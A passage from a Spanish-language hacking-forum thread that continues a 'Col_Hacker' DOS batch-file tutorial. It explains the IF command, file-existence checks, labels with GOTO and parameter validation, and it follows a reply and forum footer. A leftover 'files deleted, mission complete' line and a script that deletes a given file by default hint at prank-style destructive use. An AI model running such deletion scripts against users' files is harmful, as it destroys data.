Presione cualquier tecla para continuar. . .

Archivos Eliminados. Mision Completa
----------------------------------

IF: Condicional
El comando IF nos permite hacer a los bat mas utiles e inteligentes. Usando
este comando el programa puede chequear parametros y de acuerdo al resultado
ejecutar determinada tarea. No solamente puede chequear parametros, puedes
tambien x ej ver si un archivo existe en alguna ubicacion o no.

Chequeando si un archivo existe o no

El sintaxis general para chequear la existencia de un archivo es el sgte:

IF [NOT] EXIST nombredearchivo Comando

Sera mas claro con el sgte ej:
IF EXIST c:\autoexec.bat ECHO Si q Existe
Este comando mira si el archivo c:\autoexec.bat existe o no. Si existe ejecuta
el comando y si no simplemente no hace nada.

En el ejemplo anterior si el archivo autoexec.bat no existe el programa no
hace nada, tambien podemos hacer que ejecute una accion si la condicion es
falsa usando el comando GOTO. Observa el siguiente ejemplo para que quede un
poco mas claro:

  @echo off
IF EXIST C:\colhackers.txt GOTO HKCK
Goto end
:HKCK
ECHO colhackers.txt existe
:end

El comando IF en este codigo mira si el archivo c:\colhackers.txt existe, si
la condicion es cierta salta a :HKCK y si no salta a :End
:HKCK y :END en el ejemplo anterior son llamados Etiquetas.

******************
Tambien podemos chequear por mas de una archivo al mismo tiempo de la sigt
forma:
IF EXIST c:\autoexec.bat IF EXIST c:\autoexec.bak ECHO Ambos Existen
******************
Podemos chequear si un archivo NO existe de la misma forma, el
sintaxis basico seria:
IF NOT EXIST nombredearchivo comando

Por ej,

IF NOT EXIST c:\colhackers.txt ECHO Este no existe

****************
Para comprobar la existencia de directorios debes usar el device NUL, ya que
algo como, IF EXIST c:\windows ECHO Existe, no funcionara, asi que el comando
seria algo como:
IF EXIST c:\windows\nul ECHO Existe
****************

Comparando variables para Validar Parametros

El sintaxis basico es:

IF [NOT] cadena1==cadena2 comando

Vamos a hacer un script que ejecute una tarea de acuerdo a el parametro
especificado por el usuario:

  @ECHO off
IF %1==cp GOTO COPY
GOTO DEL
:COPY
Copy %2  a:
GOTO :END
:DEL
Del %2
:END

Este ejemplo es muy claro. EL comando IF compara el primer parametro con cp,
si coincide salta a la etiqueta COPY y si no salta a DEL

Podemos editar el ej anterior para hacer que DOS chequee si el parametro fue
dado por el usuario o no y si no que devuelva un mensaje de error solo agregando
las sgts lineas al principio del archivo anterior:

  @ECHO OFF
IF "%1" == "" ECHO Aqui iria el mensaje de error

Si no hay ningun parametro el archivo muestra un mensaje de error.
Similarmente podemos tambien chequear la existencia del segundo parametro.
parte 2???????????????


:S

y yo que pense que el otro era largo...

T-T

igual gracias intentare leermelo todo...

salu2!
Re: Parte 2 Col_Hacker Volumen 1 (no tengo mas :( )
Mensaje Hoy a las 13:52 por Contenido patrocinado
 

Parte 2 Col_Hacker Volumen 1 (no tengo mas :( )

Ver el tema anterior Ver el tema siguiente Volver arriba 

Página 1 de 1.

Permisos de este foro:No puedes responder a temas en este foro.
Dark Soul Master :: PC Zone :: Security Zone-
Cambiar a: